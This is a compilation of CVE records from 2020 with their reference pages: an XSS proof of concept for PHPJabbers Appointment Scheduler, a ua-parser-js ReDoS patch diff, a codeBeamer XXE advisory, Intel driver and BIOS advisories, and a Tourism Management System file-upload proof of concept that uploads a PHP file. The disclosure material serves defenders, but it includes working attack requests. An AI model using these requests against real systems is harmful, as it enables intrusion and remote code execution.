Multiple cross-site scripting (XSS) vulnerabilities exist in PHPJabbers Appointment Scheduler 2.3, in the index.php admin login webpage (with different request parameters), allows remote attackers to inject arbitrary web script or HTML.

    # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)# Date: 2020-12-14# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.phpjabbers.com# Software Link: https://www.phpjabbers.com/appointment-scheduler# Version: 2.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)# CVE: CVE-2020-35416Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.PoC Request:GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1Host: [removed]Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36X-Requested-With: XMLHttpRequestSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://[removed]Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422PoC Response:HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Dec 2020 10:48:41 GMTContent-Type: text/html; charset=utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Origin, X-Requested-WithContent-Length: 13988<div class="container-fluid">   <div class="row">       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">           <div class="panel panel-default pjAsContainer pjAsAside">               <div class="panel-heading p...[SNIP]...<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>...[SNIP]...PoC Screenshots:https://imgrz.com/item/naqZhttps://imgrz.com/item/ngZ1orhttps://imagebin.ca/v/5kkKgOdFS9n5https://imagebin.ca/v/5kkKlhi4amhj

CVE-2020-35416: PHPJabbers Appointment Scheduler 2.3 Cross Site Scripting ≈ Packet Storm

The package ua-parser-js before 0.7.23 are vulnerable to Regular Expression Denial of Service (ReDoS) in multiple regexes (see linked commit for more info).

@@ -222,7 +222,7 @@  
// Presto based /(opera\\smini)\\/(\[\\w\\.\-\]+)/i, // Opera Mini /(opera\\s\[mobiletab\]+).+version\\/(\[\\w\\.\-\]+)/i, // Opera Mobi/Tablet /(opera\\s\[mobiletab\]{3,6}).+version\\/(\[\\w\\.\-\]+)/i, // Opera Mobi/Tablet /(opera).+version\\/(\[\\w\\.\]+)/i, // Opera > 9.80 /(opera)\[\\/\\s\]+(\[\\w\\.\]+)/i // Opera < 9.80 \], \[NAME, VERSION\], \[ @@ -252,7 +252,7 @@ /(konqueror)\\/(\[\\w\\.\]+)/i // Konqueror \], \[\[NAME, 'Konqueror'\], VERSION\], \[  
/(trident).+rv\[:\\s\](\[\\w\\.\]+).+like\\sgecko/i // IE11 /(trident).+rv\[:\\s\](\[\\w\\.\]{1,9}).+like\\sgecko/i // IE11 \], \[\[NAME, 'IE'\], VERSION\], \[  
/(edge|edgios|edga|edg)\\/((\\d+)?\[\\w\\.\]+)/i // Microsoft Edge @@ -362,13 +362,13 @@ /fxios\\/(\[\\w\\.\-\]+)/i // Firefox for iOS \], \[VERSION, \[NAME, 'Firefox'\]\], \[  
/version\\/(\[\\w\\.\]+).+?mobile\\/\\w+\\s(safari)/i // Mobile Safari /version\\/(\[\\w\\.\]+)\\s.\*mobile\\/\\w+\\s(safari)/i // Mobile Safari \], \[VERSION, \[NAME, 'Mobile Safari'\]\], \[  
/version\\/(\[\\w\\.\]+).+?(mobile\\s?safari|safari)/i // Safari & Safari Mobile /version\\/(\[\\w\\.\]+)\\s.\*(mobile\\s?safari|safari)/i // Safari & Safari Mobile \], \[VERSION, NAME\], \[  
/webkit.+?(gsa)\\/(\[\\w\\.\]+).+?(mobile\\s?safari|safari)(\\/\[\\w\\.\]+)/i // Google Search Appliance on iOS /webkit.+?(gsa)\\/(\[\\w\\.\]+)\\s.\*(mobile\\s?safari|safari)(\\/\[\\w\\.\]+)/i // Google Search Appliance on iOS \], \[\[NAME, 'GSA'\], VERSION\], \[  
/webkit.+?(mobile\\s?safari|safari)(\\/\[\\w\\.\]+)/i // Safari < 3.0 @@ -387,7 +387,7 @@  
// Firefox/SeaMonkey/K-Meleon/IceCat/IceApe/Firebird/Phoenix /(firefox)\\/(\[\\w\\.\]+)\\s\[\\w\\s\\-\]+\\/\[\\w\\.\]+$/i, // Other Firefox-based /(mozilla)\\/(\[\\w\\.\]+).+rv\\:.+gecko\\/\\d+/i, // Mozilla /(mozilla)\\/(\[\\w\\.\]+)\\s.+rv\\:.+gecko\\/\\d+/i, // Mozilla  
// Other /(polaris|lynx|dillo|icab|doris|amaya|w3m|netsurf|sleipnir)\[\\/\\s\]?(\[\\w\\.\]+)/i, @@ -487,7 +487,7 @@ /(sprint\\s(\\w+))/i // Sprint Phones \], \[\[VENDOR, mapper.str, maps.device.sprint.vendor\], \[MODEL, mapper.str, maps.device.sprint.model\], \[TYPE, MOBILE\]\], \[  
/(htc)\[;\_\\s\-\]+(\[\\w\\s\]+(?\=\\)|\\sbuild)|\\w+)/i, // HTC /(htc)\[;\_\\s\-\]{1,2}(\[\\w\\s\]+(?\=\\)|\\sbuild)|\\w+)/i, // HTC /(zte)\-(\\w\*)/i, // ZTE /(alcatel|geeksphone|nexian|panasonic|(?\=;\\s)sony)\[\_\\s\-\]?(\[\\w\-\]\*)/i // Alcatel/GeeksPhone/Nexian/Panasonic/Sony @@ -591,13 +591,13 @@ \], \[MODEL, \[VENDOR, 'Google'\], \[TYPE, MOBILE\]\], \[  
/android.+;\\s(\\w+)\\s+build\\/hm\\1/i, // Xiaomi Hongmi 'numeric' models /android.+(hm\[\\s\\-\_\]\*note?\[\\s\_\]\*(?:\\d\\w)?)\\s+build/i, // Xiaomi Hongmi /android.+(redmi\[\\s\\-\_\]\*(?:note|k)?(?:\[\\s\_\]?\[\\w\\s\]+))(?:\\s+build|\\))/i, /android.+(hm\[\\s\\-\_\]?note?\[\\s\_\]?(?:\\d\\w)?)\\sbuild/i, // Xiaomi Hongmi /android.+(redmi\[\\s\\-\_\]?(?:note|k)?(?:\[\\s\_\]?\[\\w\\s\]+))(?:\\sbuild|\\))/i, // Xiaomi Redmi /android.+(mi\[\\s\\-\_\]\*(?:a\\d|one|one\[\\s\_\]plus|note lte)?\[\\s\_\]?(?:\\d?\\w?)\[\\s\_\]\*(?:plus)?)\\s+build/i /android.+(mi\[\\s\\-\_\]?(?:a\\d|one|one\[\\s\_\]plus|note lte)?\[\\s\_\]?(?:\\d?\\w?)\[\\s\_\]?(?:plus)?)\\sbuild/i // Xiaomi Mi \], \[\[MODEL, /\_/g, ' '\], \[VENDOR, 'Xiaomi'\], \[TYPE, MOBILE\]\], \[ /android.+(mi\[\\s\\-\_\]\*(?:pad)(?:\[\\s\_\]?\[\\w\\s\]+))(?:\\s+build|\\))/i // Mi Pad tablets /android.+(mi\[\\s\\-\_\]?(?:pad)(?:\[\\s\_\]?\[\\w\\s\]+))(?:\\sbuild|\\))/i // Mi Pad tablets \],\[\[MODEL, /\_/g, ' '\], \[VENDOR, 'Xiaomi'\], \[TYPE, TABLET\]\], \[ /android.+;\\s(m\[1-5\]\\snote)\\sbuild/i // Meizu \], \[MODEL, \[VENDOR, 'Meizu'\], \[TYPE, MOBILE\]\], \[ @@ -611,7 +611,7 @@ /android.+\[;\\/\]\\s\*(RCT\[\\d\\w\]+)\\s+build/i // RCA Tablets \], \[MODEL, \[VENDOR, 'RCA'\], \[TYPE, TABLET\]\], \[  
/android.+\[;\\/\\s\]+(Venue\[\\d\\s\]{2,7})\\s+build/i // Dell Venue Tablets /android.+\[;\\/\\s\](Venue\[\\d\\s\]{2,7})\\s+build/i // Dell Venue Tablets \], \[MODEL, \[VENDOR, 'Dell'\], \[TYPE, TABLET\]\], \[  
/android.+\[;\\/\]\\s\*(Q\[T|M\]\[\\d\\w\]+)\\s+build/i // Verizon Tablet @@ -669,8 +669,8 @@ /android.+\[;\\/\]\\s\*TU\_(1491)\\s+build/i // Rotor Tablets \], \[MODEL, \[VENDOR, 'Rotor'\], \[TYPE, TABLET\]\], \[  
/android.+(KS(.+))\\s+build/i // Amazon Kindle Tablets \], \[MODEL, \[VENDOR, 'Amazon'\], \[TYPE, TABLET\]\], \[ //android.+(KS(.+))\\s+build/i // Amazon Kindle Tablets //\], \[MODEL, \[VENDOR, 'Amazon'\], \[TYPE, TABLET\]\], \[  
/android.+(Gigaset)\[\\s\\-\]+(Q\\w{1,9})\\s+build/i // Gigaset Tablets \], \[VENDOR, MODEL, \[TYPE, TABLET\]\], \[

CVE-2020-7793: Fix ReDoS vulnerabilities reported by Snyk · faisalman/ua-parser-js@6d1f26d

An issue was discovered in Intland codeBeamer ALM 10.x through 10.1.SP4. The ReqIF XML data, used by the codebeamer ALM application to import projects, is parsed by insecurely configured software components, which can be abused for XML External Entity Attacks.

############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: codeBeamer Application Lifecycle Management (ALM) \[1\] # Vendor: Intland Software # CSNC ID: CSNC-2020-008 # CVE ID: CVE-2020-26513 # Subject: XML External Entity Resolution (XXE) # Risk: High # Effect: Remotely exploitable # Author: Alex Joss and Emanuele Barbeno (advisories@compass-security.com) # Date: 07.12.2020 # ############################################################# Introduction: ------------- codeBeamer Application Lifecycle Management (ALM) provides Project-, Task-, Requirement-, Test- Change-, Configuration-, Build-, Knowledge- and Document management in a single, secure environment. It enables software and hardware development to be more collaborative, transparent and productive. \[2\] ReqIF XML data is parsed by insecurely configured software components, which can be abused for XML External Entity Attacks. \[3\] Affected: --------- Vulnerable: 10.0.0-final 10.1.0-final 10.1.SP4 Not Vulnerable: 20.11-lts No other version was tested, but it is believed for the older versions to be vulnerable as well. Technical Description --------------------- The XML parser used to read the ReqIF file content is not configured to deny the resolution of external entities. Special crafted ReqIF files, which trigger the deserializaiton of entities, can be used to trigger XXE attacks. In order to find a valid ReqIF file, it is possible to use the Export feature accessible by clicking on the following links: "Projects" -> select one project where the logged-in user has admin rights -> "Admin" -> "Export" Here the modified ReqIF file used to read the content of the C:\\Windows\\win.ini file: \`\`\` \]> &c; 2020-05-07T00:11:29-07:00 \[CUT-BY-COMPASS\] \`\`\` The ReqIF file above has been zipped and the extension has been changed from .zip to .reqifz After logging in to the codeBeamer application, reach the Import functionality by clicking on the following links: "Projects" -> select one project where the logged-in user has admin rights -> "Admin" -> "Import" -> "Import ReqIF…" By selecting the generated .reqifz file, the following request is sent: \`\`\` POST /cb/ajax/project/2/uploadReqIF.spr HTTP/1.1 Host: codebeamer.local:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: application/json, text/javascript, \*/\*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------113369293913002634562735685816 Content-Length: 2866 Origin: http://codebeamer.local:8080 DNT: 1 Connection: close Referer: http://codebeamer.local:8080/cb/proj/admin.spr?proj\_id=2 Cookie: JSESSIONID=\[CUT-BY-COMPASS\]; CB\_LOGIN=\[CUT-BY-COMPASS\] -----------------------------113369293913002634562735685816 Content-Disposition: form-data; name="file"; filename="lfi-xxe.reqifz" Content-Type: application/octet-stream PK \[CUT-BY-COMPASS\] -----------------------------113369293913002634562735685816-- \`\`\` And the following response is received. The content of the C:\\Windows\\win.ini file is present in the "description" and "COMMENT" response fields: \`\`\` HTTP/1.1 200 X-XSS-Protection: 1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Cache-Control: no-store Content-Type: application/json;charset=UTF-8 Content-Language: en-US Content-Length: 200023 Date: Thu, 07 May 2020 07:40:35 GMT Connection: close { "importConfig" : { "name" : "test", "description" : "; for 16-bit app support\\n\[fonts\]\\n\[extensions\]\\n\[mci extensions\]\\n\[files\]\\n\[Mail\]\\nMAPI=1\\n", "reqIF" : { "IDENTIFIER" : "CB-WIN-02-00-4C-4F-4F-50-2-1588835489663", "COMMENT" : "; for 16-bit app support\\n\[fonts\]\\n\[extensions\]\\n\[mci extensions\]\\n\[files\]\\n\[Mail\]\\nMAPI=1\\n", "CREATION-TIME" : "2020-05-07T00:11:29-07:00", "REPOSITORY-ID" : "CB-WIN-02-00-4C-4F-4F-50-2", "REQ-IF-TOOL-ID" : "Intland CodeBeamer 10.0.0-final", "REQ-IF-VERSION" : "1.0", "SOURCE-TOOL-ID" : "Intland CodeBeamer 10.0.0-final", "TITLE" : "test", "CONVERSATION-ID" : "ee46816f-a88f-45f5-bcbd-d930ee3e9c51" }, "items" : \[ { \[CUT-BY-COMPASS\] \`\`\` Workaround / Fix: ----------------- The vulnerability is a result of a weakly configured/parameterized XML parser \[3\]. The parser needs to be hardened by changing settings in the configuration or parameters in the code. It must not allow the use of inline DTDs and external entities. Timeline: --------- 2020-05-14: Discovery by Alex Joss and Emanuele Barbeno 2020-05-18: Initial vendor notification 2020-05-18: Initial vendor response 2020-10-02: Assigned CVE-2020-26513 2020-12-01: Patched version released 2020-12-07: Public disclosure References: ----------- \[1\] https://intland.com/codebeamer/application-lifecycle-management/ \[2\] https://codebeamer.com/cb/wiki/199594 \[3\] https://cheatsheetseries.owasp.org/cheatsheets/XML\_External\_Entity\_Prevention\_Cheat\_Sheet.html

CVE-2020-26513

Out of bounds write in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi Software Advisory**

Intel ID:

INTEL-SA-00338

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

04/14/2020

Last revised:

02/11/2021

**Summary: **

Potential security vulnerabilities in some Intel® PROSet/Wireless WiFi products may allow escalation of privilege or denial of service. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-0557

Description: Insecure inherited permissions in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2020-0558

Description: Improper buffer restrictions in kernel mode driver for Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an unprivileged user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector:  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2020-0569  

Description: Out of bounds write in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

Intel® PROSet/Wireless WiFi software for the following products before version 21.70:

Intel® Wi-Fi 6 AX201  
Intel® Wi-Fi 6 AX200  
Intel® Wireless-AC 9560  
Intel® Wireless-AC 9462  
Intel® Wireless-AC 9461  
Intel® Wireless-AC 9260  
Intel® Dual Band Wireless-AC 8265  
Intel® Dual Band Wireless-AC 8260  
Intel® Dual Band Wireless-AC 3168  
Intel® Wireless 7265 (Rev D) Family  
Intel® Dual Band Wireless-AC 3165

**Recommendations:**

Intel recommends updating the drivers and software for Intel® PROSet/Wireless WiFi products on Windows 10 to the versions listed below:

**Impacted Product**

**Updated Driver Version**

Intel® Wi-Fi 6 AX201

21.70.0.6

Intel® Wi-Fi 6 AX200

21.70.0.6

Intel® Wireless-AC 9560

21.70.0.6

Intel® Wireless-AC 9462

21.70.0.6

Intel® Wireless-AC 9461

21.70.0.6

Intel® Wireless-AC 9260

21.70.0.6

Intel® Dual Band Wireless-AC 8265

20.70.16.4

Intel® Dual Band Wireless-AC 8260

20.70.16.4

Intel® Dual Band Wireless-AC 3168

19.51.27.1

Intel® Wireless 7265 (Rev D) Family

19.51.27.1

Intel® Dual Band Wireless-AC 3165

19.51.27.1

Driver and software updates are available for download at this location.

Additional support information is available at the Wireless Support site.

**Acknowledgements:**

Intel would like to thank Kong, Haikuo Xie, Ying Wang and Andrew Hess for reporting these issues.  

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

04/14/2020

Initial Release

1.1

08/20/2020

Added CVE-2020-0569

1.2

11/25/2020

Updated CVE-2020-0569 to appropriately reflect an attack vector of adjacent.

1.3

02/11/2021

Updated Recommendations

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0569: INTEL-SA-00338

Improper access control in BlueZ may allow an unauthenticated user to potentially enable information disclosure via adjacent access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**BlueZ Advisory**

Intel ID:

INTEL-SA-00435

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

HIGH

Original release:

10/13/2020

Last revised:

10/15/2020

**Revision History**

Revision

Date

Description

1.0

10/13/2020

Initial Release

1.1

10/15/2020

Removed reference to Linux kernel version

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-12352: INTEL-SA-00435

An Arbitrary File Upload is discovered in SourceCodester Tourism Management System 1.0 allows the user to conduct remote code execution via admin/create-package.php vulnerable page.

    #Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload
    #Date: 2020-10-19
    #Exploit Author: Ankita Pal & Saurav Shukla
    #Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
    #Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
    #Version: V1.0
    #Tested on: Windows 10 + xampp v3.2.4
    
    
    Proof of Concept:::
    
    Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
    
    Step 2: Open Tour Package -> Create
    
    Malicious Request:::
    
    POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1
    Host: localhost:8081
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713
    Content-Length: 1101
    Origin: http://localhost:8081
    Connection: close
    Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
    Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
    Upgrade-Insecure-Requests: 1
    
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagename"
    
    Pack1
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagetype"
    
    Family
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagelocation"
    
    Manali
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packageprice"
    
    21
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagefeatures"
    
    Free
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagedetails"
    
    Details
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packageimage"; filename="file1.php"
    Content-Type: application/octet-stream
    
    <?php
    	phpinfo();
    ?>
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------63824304340061635682865592713--

CVE-2020-28136: OffSec’s Exploit Database Archive

Improper input validation in the Auto-Discovery component of Nagios XI before 5.7.5 allows an authenticated attacker to execute remote code.

CVE-2020-28648: Nagios XI Change Log - Nagios

Improper input validation in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2020.2 IPU – BIOS Advisory**

Intel ID:

INTEL-SA-00358

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

11/10/2020

Last revised:

11/10/2020

**Summary: **

Potential security vulnerabilities in the BIOS firmware for some Intel® Processors may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID:  CVE-2020-0590

Description: Improper input validation in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.7 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:H

CVEID:  CVE-2020-0587

Description: Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:L

CVEID:  CVE-2020-0591

Description: Improper buffer restrictions in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVEID:  CVE-2020-0593

Description: Improper buffer restrictions in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:L

CVEID:  CVE-2020-0588

Description: Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.8 Low

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N

CVEID:  CVE-2020-0592

Description: Out of bounds write in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or denial of service via local access.

CVSS Base Score: 3.0 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L

**Affected Products:**

2nd Generation Intel® Xeon® Scalable and Intel® Xeon® Scalable Processors

*   CVE-2020-0590
*   CVE-2020-0591
*   CVE-2020-0592
*   CVE-2020-0593
*   CVE-2020-0587
*   CVE-2020-0588

Intel® Xeon® Processor D Family,  Intel® Xeon® Processor E5 v4 Family and Intel® Xeon® Processor E5 v3 Family              

*   CVE-2020-0591
*   CVE-2020-0592

10th Generation Intel® Core™ processors, 9th Generation Intel® Core™ processors, 8th Generation Intel® Core™ processors, 7th Generation Intel® Core™ processors, 6th Generation Intel® Core™ processors and

Intel® Core™ Processors with Intel® Hybrid Technology  

*   CVE-2020-0593

Intel® Xeon® Processor E7 v4 Family and Intel® Xeon® Processor E7 v2 Family      

*   CVE-2020-0592

Intel® Core™ X-series Processors and Intel® Xeon® Processor W Family   

*   CVE-2020-0587
*   CVE-2020-0591
*   CVE-2020-0592
*   CVE-2020-0593

Intel® Xeon® Processor D Family, Intel® Xeon® W Processor and Intel® Core™ X-series Processors

*   CVE-2020-0591
*   CVE-2020-0592
*   CVE-2020-0593

**Recommendations:  
**

Intel recommends that users of the affected products update to the latest BIOS firmware provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employees.  Intel would like to thank, Nagaraju N Kodalapura and Hareesh Khattri for CVE-2020-0590, Jorge E Gonzalez Diaz for CVE-2020-0588, Nicholas Armour for CVE-2020-0587, and Brent Holtsclaw for CVE-2020-0591 and CVE-2020-0591.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/10/2020

Initial Release

1.1

03/15/2021

Updated affected products for CVE-2020-0591/0592

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

